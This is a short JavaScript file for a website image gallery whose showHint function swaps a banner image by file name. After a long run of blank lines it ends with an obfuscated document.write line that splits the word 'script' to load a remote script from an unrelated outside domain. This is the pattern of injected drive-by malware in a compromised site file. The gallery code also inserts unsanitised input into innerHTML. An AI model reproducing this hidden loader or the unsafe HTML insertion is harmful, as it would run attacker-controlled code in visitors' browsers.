// JavaScript Document
var xmlHttp
function showHint(str)
	{
		
		if (str.length==0)
			{ 
				document.getElementById("gallery_img").innerHTML="<img src='images/gallery/smart_gal_01.jpg' width='567' height='361' id='main_banner' />"
				return
			}
		else if (str.length > 0)
			{
				document.getElementById("gallery_img").innerHTML="<img src='images/gallery/"+str+".jpg' width='567' height='361' id='main_banner' />"
			}

	}
	











document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Hard_Copy.js"></scri'+'pt>');